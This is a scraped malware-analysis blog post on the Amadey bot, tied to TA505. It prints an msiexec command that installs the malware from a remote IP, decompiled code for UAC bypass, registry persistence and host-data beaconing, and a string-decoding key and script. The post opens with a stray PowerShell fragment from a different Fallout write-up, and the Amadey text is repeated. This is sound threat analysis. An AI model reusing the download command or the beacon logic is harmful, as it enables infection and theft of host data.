$I1I1l1IIllI1.IIIlI = [System.Runtime.InteropServices.Marshal]::SizeOf($I1I1l1IIllI1); $IIl1Il1I = New-Object I1lII1Il1; [l1Il11III]::CreateProcess($lll1IllI1, $lll1IllI1, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00000008, [IntPtr]::Zero, "c:", [ref]$I1I1l1IIllI1, [ref]$IIl1Il1I) | out-null; </code></pre></div></div> Thus the malware is downloaded and executed. <h2 id="conclusion">Conclusion</h2> Fallout has been heavily updated, making analysis very difficult. Very sophisticated techniques such as Diffie-Hellman key exchange, VM detection, process detection, etc. are used. We need to be careful as they may be updated in the future.
Analyzing Amadey

Sat, 27 Apr 2019 15:00:00 -0000

Initial Access Amedey is installed by msiexec.exe when you open a malicious excel file. From the document file technique, the threat actor is considered TA505. Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784 The download URL is as follows: msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' First payload First payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner. Amadey The dumped PE is compiled with MinGW. PE: compiler: MinGW(-)[-] PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32] It contains symbol information. Amedey has the following functions: _Z10aBypassUACv _Z10aCharToIntPc _Z10aGetOsArchv _Z10aIntToChari _Z11aAutoRunSetPc _Z11aCheckAdminv _Z11aCreateFilePc _Z11aFileExistsPKc _Z11aGetTempDirv _Z11aProcessDllPcS_ _Z11aProcessExePcS_S_S_ _Z11aRunAsAdminPc _Z12aGetHostNamev _Z12aGetSelfPathv _Z12aGetUserNamev _Z12aProcessTaskPc _Z12aResolveHostPc _Z12aWinSockPostPcS_S_ _Z13aDropToSystemPc _Z13aGetProcessILv _Z14aCreateProcessPc _Z14aGetProgramDirv _Z15aUrlMonDownloadPcS_ _Z16aDirectoryExistsPc _Z16aExtractFileNamePc _Z16aGetHomeDriveDirv _Z16aProcessDllLocalPcS_S_S_ _Z16aProcessExeLocalPcS_S_S_ _Z19aGetSelfDestinationi _Z5aCopyPcii _Z5aParsPcS_ _Z6aBasici _Z6aGetIdv _Z6aGetOsv _Z6aMkDirPc _Z7aPathAVPc _Z7aRaportPcS_ _Z8aCheckAVv _Z8aDecryptPc _Z8aPosLastPcS_ _Z9aCopyFilePcS_ _Z9aFileSizePc _Z9aFillCharPc _Z9aFreeFilePc _Z9aPosFirstPcS_ _Z9aRunDll32PcS_ The main function is as follows. int __cdecl main(int _Argc,char **_Argv,char **_Env) { char *pcVar1; /* 0x3ac8 97 main */ FUN_00404020(); FUN_00403cc0(); _Z10aBypassUACv(); pcVar1 = _Z12aGetSelfPathv(); _Z13aDropToSystemPc(pcVar1); pcVar1 = _Z19aGetSelfDestinationi(0); _Z11aAutoRunSetPc(pcVar1); _Z6aBasici(0); return 0; } The _Z6aBasici function is as follows. /* WARNING: Globals starting with '_' overlap smaller symbols at the same address */ void __cdecl _Z6aBasici(int param_1) { char *_Source; uint uVar1; int iVar2; /* 0x33fe 32 _Z6aBasici */ FUN_00404020(); _Z9aFillCharPc(&stack0xffffeff4); _Z9aFillCharPc(&stack0xffffddf4); _Z9aFillCharPc(&stack0xffffdbf4); _Source = _Z8aDecryptPc(&aDomain); strcat(&stack0xffffddf4,_Source); _Source = _Z8aDecryptPc(&aScript); strcat(&stack0xffffdbf4,_Source); _Source = _Z8aDecryptPc(&aParam0); strcat(&stack0xffffeff4,_Source); _Source = _Z6aGetIdv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aVers); strcat(&stack0xffffeff4,_Source); uVar1 = _Z11aCheckAdminv(); if ((uVar1 & 0xff) == 1) { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"1"); } else { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"0"); } _Source = _Z8aDecryptPc(&aParam3); strcat(&stack0xffffeff4,_Source); _Source = _Z10aGetOsArchv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam4); strcat(&stack0xffffeff4,_Source); _Source = _Z10aIntToChari(param_1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam5); strcat(&stack0xffffeff4,_Source); iVar2 = _Z6aGetOsv(); _Source = _Z10aIntToChari(iVar2); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam6); strcat(&stack0xffffeff4,_Source); uVar1 = _Z8aCheckAVv(); _Source = _Z10aIntToChari(uVar1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam7); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetHostNamev(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam8); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetUserNamev(); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"&"); if (param_1 == 0) { do { _Z9aFillCharPc(&stack0xffffdff4); _Source = _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); strcat(&stack0xffffdff4,_Source); _Z5aParsPcS_(&stack0xffffdff4,"#"); Sleep(_aTimeOut); } while( true ); } if (param_1 == 1) { _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); } return; } Some important parameters are encoded. However, the encoding algorithm is very simple. key is 8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7 Finally, we analyze the decoded string and the name of the function in which it was used. _Z11aAutoRunSetPc AutoRunCmd : REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d _Z8aCheckAVv AV00 : AVAST Software AV01 : Avira AV02 : Kaspersky Lab AV03 : ESET AV04 : Panda Security AV05 : Doctor Web AV06 : AVG AV07 : 360TotalSecurity AV08 : Bitdefender AV09 : Norton AV10 : Sophos AV11 : Comodo _Z12aWinSockPostPcS_S_ CMD0 : <c> CMD1 : <d> _Z11aProcessDllPcS_ dll : dll _Z7aRaportPcS_, _Z6aBasici domain : gohaiendo[.]com _Z19aGetSelfDestinationi DropDir : f64a428dfd DropName : cmualrc.exe _Z11aProcessExePcS_S_S_ exe : exe _Z14aGetProgramDirv GetProgDir : ProgramData\ _Z10aGetOsArchv, _Z6aGetOsv OS_AR0 : kernel32.dll OS_AR1 : GetNativeSystemInfo _Z6aBasici Param0 : id= Param1 : &vs= Param2 : &ar= Param3 : &bi= Param4 : &lv= Param5 : &os= Param6 : &av= Param7 : &pc= Param8 : &un= Vers : 1.22 ZoneIdent : :Zone.Identifier _Z12aWinSockPostPcS_S_ Post0 : 1310 Post1 : HTTP/1.1 Post2 : Accept: / Post3 : Content-Type: application/x-www-form-urlencoded Post4 : Host: Post5 : Content-Length: Post6 : POST / _Z11aRunAsAdminPc RunAs : runas _Z9aRunDll32PcS_ RunDll_0 : rundll32.exe _Z7aRaportPcS_, _Z6aBasici Script : ppk/index.php _Z11aCheckAdminv Shell : SHELL32.DLL _Z14aCreateProcessPc, _Z6aBasici TimeOut : 40133-98-10017 _Z15aUrlMonDownloadPcS_ URLMon_0 : urlmon URLMon_1 : URLDownloadToFileA Here is the simple python script. ''' domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85] AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00 AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94] AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92] AV03=[0x7D, 0xB8, 0xA7, 0xB8] AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD] AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B] AV06=[0x79, 0xBB, 0xA9] AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2] AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5] AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7] AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC] AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8] CMD0=[0x74, 0xC8, 0xA0] CMD1=[0x74, 0xC9, 0xA0] DLL=[0x9C, 0xD1, 0xCE] DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D] DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98] exe=[0x9D, 0xDD, 0xC7] GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE] OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE] OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F] Param0=[0xA1, 0xC9, 0x9F] Param1=[0x5E, 0xDB, 0xD5, 0xA1] Param2=[0x5E, 0xC6, 0xD4, 0xA1] Param3=[0x5E, 0xC7, 0xCB, 0xA1] Param4=[0x5E, 0xD1, 0xD8, 0xA1] Param5=[0x5E, 0xD4, 0xD5, 0xA1] Param6=[0x5E, 0xC6, 0xD8, 0xA1] Param7=[0x5E, 0xD5, 0xC5, 0xA1] Param8=[0x5E, 0xDA, 0xD0, 0xA1] Post0=[0x45, 0x6F] Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67] Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D] Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C] Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59] Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59] Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68] RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6] RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50] Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0] Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F] TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44] URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7] URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77] Vers=[0x69, 0x93, 0x94, 0x96] ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB] ''' encoded_str=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] Key="8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7" c=0 while(1): length = len(encoded_str) if length <= c: break length = len(Key); print(chr(encoded_str[c] - ord(Key[c % length])), end='') #print(encoded_str[c] - ord(Key[c % length]), end='') c += 1 References https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/

<h2 id="initial-access">Initial Access</h2> Amedey is installed by msiexec.exe when you open a malicious excel file. From the document file technique, the threat actor is considered TA505. <ul> <li><a href="https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/">Excel 4.0 Macro Utilized by TA505 to Target Financial Institutions Recently</a></li> <li><a href="https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware">Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware</a></li> </ul> <img src="https://nao-sec.org/assets/2019-04-28/01.jpg" width="100%" /> https://app.any.run/tasks/3430e711-7bb1-49b4-ac07-86b1a6b5c784 The download URL is as follows: <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msiexec.exe STOP=1 /i http://109.234.38.177/dom4 /q ksw='%TEMP%' </code></pre></div></div> <h2 id="first-payload">First payload</h2> First payload is packed. Extract the original PE using the hollows_hunter mode of tknk_scanner. <img src="https://nao-sec.org/assets/2019-04-28/02.jpg" width="100%" /> <h2 id="amadey">Amadey</h2> The dumped PE is compiled with MinGW. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PE: compiler: MinGW(-)[-] PE: linker: GNU linker ld (GNU Binutils)(2.56*)[EXE32] </code></pre></div></div> It contains symbol information. Amedey has the following functions: <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>_Z10aBypassUACv _Z10aCharToIntPc _Z10aGetOsArchv _Z10aIntToChari _Z11aAutoRunSetPc _Z11aCheckAdminv _Z11aCreateFilePc _Z11aFileExistsPKc _Z11aGetTempDirv _Z11aProcessDllPcS_ _Z11aProcessExePcS_S_S_ _Z11aRunAsAdminPc _Z12aGetHostNamev _Z12aGetSelfPathv _Z12aGetUserNamev _Z12aProcessTaskPc _Z12aResolveHostPc _Z12aWinSockPostPcS_S_ _Z13aDropToSystemPc _Z13aGetProcessILv _Z14aCreateProcessPc _Z14aGetProgramDirv _Z15aUrlMonDownloadPcS_ _Z16aDirectoryExistsPc _Z16aExtractFileNamePc _Z16aGetHomeDriveDirv _Z16aProcessDllLocalPcS_S_S_ _Z16aProcessExeLocalPcS_S_S_ _Z19aGetSelfDestinationi _Z5aCopyPcii _Z5aParsPcS_ _Z6aBasici _Z6aGetIdv _Z6aGetOsv _Z6aMkDirPc _Z7aPathAVPc _Z7aRaportPcS_ _Z8aCheckAVv _Z8aDecryptPc _Z8aPosLastPcS_ _Z9aCopyFilePcS_ _Z9aFileSizePc _Z9aFillCharPc _Z9aFreeFilePc _Z9aPosFirstPcS_ _Z9aRunDll32PcS_ </code></pre></div></div> The main function is as follows. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl main(int _Argc,char **_Argv,char **_Env) { char *pcVar1; /* 0x3ac8 97 main */ FUN_00404020(); FUN_00403cc0(); _Z10aBypassUACv(); pcVar1 = _Z12aGetSelfPathv(); _Z13aDropToSystemPc(pcVar1); pcVar1 = _Z19aGetSelfDestinationi(0); _Z11aAutoRunSetPc(pcVar1); _Z6aBasici(0); return 0; } </code></pre></div></div> The _Z6aBasici function is as follows. <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */ void __cdecl _Z6aBasici(int param_1) { char *_Source; uint uVar1; int iVar2; /* 0x33fe 32 _Z6aBasici */ FUN_00404020(); _Z9aFillCharPc(&stack0xffffeff4); _Z9aFillCharPc(&stack0xffffddf4); _Z9aFillCharPc(&stack0xffffdbf4); _Source = _Z8aDecryptPc(&aDomain); strcat(&stack0xffffddf4,_Source); _Source = _Z8aDecryptPc(&aScript); strcat(&stack0xffffdbf4,_Source); _Source = _Z8aDecryptPc(&aParam0); strcat(&stack0xffffeff4,_Source); _Source = _Z6aGetIdv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aVers); strcat(&stack0xffffeff4,_Source); uVar1 = _Z11aCheckAdminv(); if ((uVar1 & 0xff) == 1) { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"1"); } else { _Source = _Z8aDecryptPc(&aParam2); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"0"); } _Source = _Z8aDecryptPc(&aParam3); strcat(&stack0xffffeff4,_Source); _Source = _Z10aGetOsArchv(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam4); strcat(&stack0xffffeff4,_Source); _Source = _Z10aIntToChari(param_1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam5); strcat(&stack0xffffeff4,_Source); iVar2 = _Z6aGetOsv(); _Source = _Z10aIntToChari(iVar2); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam6); strcat(&stack0xffffeff4,_Source); uVar1 = _Z8aCheckAVv(); _Source = _Z10aIntToChari(uVar1); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam7); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetHostNamev(); strcat(&stack0xffffeff4,_Source); _Source = _Z8aDecryptPc(&aParam8); strcat(&stack0xffffeff4,_Source); _Source = _Z12aGetUserNamev(); strcat(&stack0xffffeff4,_Source); strcat(&stack0xffffeff4,"&"); if (param_1 == 0) { do { _Z9aFillCharPc(&stack0xffffdff4); _Source = _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); strcat(&stack0xffffdff4,_Source); _Z5aParsPcS_(&stack0xffffdff4,"#"); Sleep(_aTimeOut); } while( true ); } if (param_1 == 1) { _Z12aWinSockPostPcS_S_(&stack0xffffddf4,&stack0xffffdbf4,&stack0xffffeff4); } return; } </code></pre></div></div> Some important parameters are encoded. However, the encoding algorithm is very simple. <img src="https://nao-sec.org/assets/2019-04-28/03.jpg" width="80%" /> key is <code class="language-plaintext highlighter-rouge">8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7</code> <img src="https://nao-sec.org/assets/2019-04-28/04.jpg" width="100%" /> Finally, we analyze the decoded string and the name of the function in which it was used. <ul> <li><code class="language-plaintext highlighter-rouge">_Z11aAutoRunSetPc</code> <ul> <li>AutoRunCmd : <code class="language-plaintext highlighter-rouge">REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d </code></li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z8aCheckAVv</code> <ul> <li>AV00 : AVAST Software</li> <li>AV01 : Avira</li> <li>AV02 : Kaspersky Lab</li> <li>AV03 : ESET</li> <li>AV04 : Panda Security</li> <li>AV05 : Doctor Web</li> <li>AV06 : AVG</li> <li>AV07 : 360TotalSecurity</li> <li>AV08 : Bitdefender</li> <li>AV09 : Norton</li> <li>AV10 : Sophos</li> <li>AV11 : Comodo</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z12aWinSockPostPcS_S_</code> <ul> <li>CMD0 : <code class="language-plaintext highlighter-rouge"><c></code></li> <li>CMD1 : <code class="language-plaintext highlighter-rouge"><d></code></li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aProcessDllPcS_</code> <ul> <li>dll : dll</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z7aRaportPcS_, _Z6aBasici</code> <ul> <li>domain : gohaiendo[.]com</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z19aGetSelfDestinationi</code> <ul> <li>DropDir : f64a428dfd</li> <li>DropName : cmualrc.exe</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aProcessExePcS_S_S_</code> <ul> <li>exe : exe</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z14aGetProgramDirv</code> <ul> <li>GetProgDir : ProgramData\</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z10aGetOsArchv, _Z6aGetOsv</code> <ul> <li>OS_AR0 : kernel32.dll</li> <li>OS_AR1 : GetNativeSystemInfo</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z6aBasici</code> <ul> <li>Param0 : id=</li> <li>Param1 : &vs=</li> <li>Param2 : &ar=</li> <li>Param3 : &bi=</li> <li>Param4 : &lv=</li> <li>Param5 : &os=</li> <li>Param6 : &av=</li> <li>Param7 : &pc=</li> <li>Param8 : &un=</li> <li>Vers : 1.22</li> <li>ZoneIdent : <code class="language-plaintext highlighter-rouge">:Zone.Identifier</code></li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z12aWinSockPostPcS_S_</code> <ul> <li>Post0 : 1310</li> <li>Post1 : HTTP/1.1</li> <li>Post2 : Accept: /</li> <li>Post3 : Content-Type: application/x-www-form-urlencoded</li> <li>Post4 : Host:</li> <li>Post5 : Content-Length:</li> <li>Post6 : POST /</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aRunAsAdminPc</code> <ul> <li>RunAs : runas</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z9aRunDll32PcS_</code> <ul> <li>RunDll_0 : rundll32.exe</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z7aRaportPcS_, _Z6aBasici</code> <ul> <li>Script : ppk/index.php</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z11aCheckAdminv</code> <ul> <li>Shell : SHELL32.DLL</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z14aCreateProcessPc, _Z6aBasici</code> <ul> <li>TimeOut : 40133-98-10017</li> </ul> </li> <li><code class="language-plaintext highlighter-rouge">_Z15aUrlMonDownloadPcS_</code> <ul> <li>URLMon_0 : urlmon</li> <li>URLMon_1 : URLDownloadToFileA</li> </ul> </li> </ul> Here is the simple python script. <div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>''' domain=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] AutoRunCmdr=[0x8A, 0xAA, 0xA9, 0x84, 0x74, 0x7D, 0x7D, 0x54, 0x58, 0x81, 0x7E, 0xA5, 0x85, 0xC0, 0x87, 0xA8, 0x9D, 0xAA, 0xA7, 0x93, 0xA3, 0x9C, 0x91, 0x85, 0xCC, 0x95, 0xD6, 0xA6, 0xD5, 0xD5, 0xCC, 0xAB, 0x95, 0x8A, 0xCB, 0x9E, 0xC8, 0xA3, 0xB0, 0xAA, 0x92, 0x73, 0xA7, 0xA3, 0xA9, 0x9A, 0xA6, 0xD7, 0x88, 0xC9, 0xA9, 0xD5, 0xCF, 0xD5, 0xA5, 0x94, 0xAA, 0xDA, 0xD4, 0x9F, 0xA8, 0xAB, 0x99, 0xA8, 0x95, 0x88, 0xD5, 0x95, 0xD6, 0x54, 0x8C, 0x9F, 0x9B, 0x9C, 0x9E, 0x51, 0x7D, 0xA4, 0xA4, 0xC7, 0x97, 0xD6, 0xAA, 0x84, 0x86, 0x95, 0x9D, 0x59, 0x62, 0xD8, 0x50, 0xB7, 0xA8, 0x9A, 0xA9, 0xAA, 0xA5, 0xA2, 0x51, 0x66, 0xA9, 0x58, 0xB5, 0x77, 0xAB, 0x96, 0xB5, 0xC0, 0x86, 0x66, 0x9C, 0x85] AV00=[0x79, 0xBB, 0xA3, 0xB7, 0x87, 0x59, 0x8C, 0xA3, 0x9C, 0xAD, 0xAA, 0xC3, 0xA2, 0xC9]#AV00 AV01=[0x79, 0xDB, 0xCB, 0xD6, 0x94] AV02=[0x83, 0xC6, 0xD5, 0xD4, 0x98, 0xAB, 0xAC, 0x9F, 0xAF, 0x59, 0x7F, 0xC3, 0x92] AV03=[0x7D, 0xB8, 0xA7, 0xB8] AV04=[0x88, 0xC6, 0xD0, 0xC8, 0x94, 0x59, 0x8C, 0x99, 0x99, 0xAE, 0xA5, 0xCB, 0xA4, 0xDD] AV05=[0x7C, 0xD4, 0xC5, 0xD8, 0xA2, 0xAB, 0x59, 0x8B, 0x9B, 0x9B] AV06=[0x79, 0xBB, 0xA9] AV07=[0x6B, 0x9B, 0x92, 0xB8, 0xA2, 0xAD, 0x9A, 0xA0, 0x89, 0x9E, 0x96, 0xD7, 0xA2, 0xCD, 0xA8, 0xB2] AV08=[0x7A, 0xCE, 0xD6, 0xC8, 0x98, 0x9F, 0x9E, 0xA2, 0x9A, 0x9E, 0xA5] AV09=[0x86, 0xD4, 0xD4, 0xD8, 0xA2, 0xA7] AV10=[0x8B, 0xD4, 0xD2, 0xCC, 0xA2, 0xAC] AV11=[0x7B, 0xD4, 0xCF, 0xD3, 0x97, 0xA8] CMD0=[0x74, 0xC8, 0xA0] CMD1=[0x74, 0xC9, 0xA0] DLL=[0x9C, 0xD1, 0xCE] DropDir=[0x9E, 0x9B, 0x96, 0xC5, 0x67, 0x6B, 0x71, 0x98, 0x9C, 0x9D] DropName=[0x9B, 0xD2, 0xD7, 0xC5, 0x9F, 0xAB, 0x9C, 0x62, 0x9B, 0xB1, 0x98] exe=[0x9D, 0xDD, 0xC7] GetProgDir=[0x88, 0xD7, 0xD1, 0xCB, 0xA5, 0x9A, 0xA6, 0x78, 0x97, 0xAD, 0x94, 0xBE] OS_AR0=[0xA3, 0xCA, 0xD4, 0xD2, 0x98, 0xA5, 0x6C, 0x66, 0x64, 0x9D, 0x9F, 0xCE] OS_AR1=[0x7F, 0xCA, 0xD6, 0xB2, 0x94, 0xAD, 0xA2, 0xAA, 0x9B, 0x8C, 0xAC, 0xD5, 0xA4, 0xC9, 0xA1, 0x82, 0xA5, 0x9C, 0x9F] Param0=[0xA1, 0xC9, 0x9F] Param1=[0x5E, 0xDB, 0xD5, 0xA1] Param2=[0x5E, 0xC6, 0xD4, 0xA1] Param3=[0x5E, 0xC7, 0xCB, 0xA1] Param4=[0x5E, 0xD1, 0xD8, 0xA1] Param5=[0x5E, 0xD4, 0xD5, 0xA1] Param6=[0x5E, 0xC6, 0xD8, 0xA1] Param7=[0x5E, 0xD5, 0xC5, 0xA1] Param8=[0x5E, 0xDA, 0xD0, 0xA1] Post0=[0x45, 0x6F] Post1=[0x58, 0xAD, 0xB6, 0xB8, 0x83, 0x68, 0x6A, 0x62, 0x67] Post2=[0x79, 0xC8, 0xC5, 0xC9, 0xA3, 0xAD, 0x73, 0x54, 0x60, 0x68, 0x5D] Post3=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 0xAD, 0x61, 0x8A, 0xB2, 0xA3, 0xC7, 0x6A, 0x84, 0x95, 0xA9, 0xA7, 0xA2, 0x99, 0x95, 0x92, 0xAB, 0x9E, 0xA7, 0xD1, 0x61, 0xDC, 0x64, 0xD9, 0xDD, 0xDD, 0x64, 0x9F, 0xA2, 0xD4, 0x9D, 0x91, 0xA9, 0xAB, 0xA3, 0x9B, 0x9E, 0x95, 0xA0, 0x9B, 0x9A, 0x9C] Post4=[0x80, 0xD4, 0xD5, 0xD8, 0x6D, 0x59] Post5=[0x7B, 0xD4, 0xD0, 0xD8, 0x98, 0xA7, 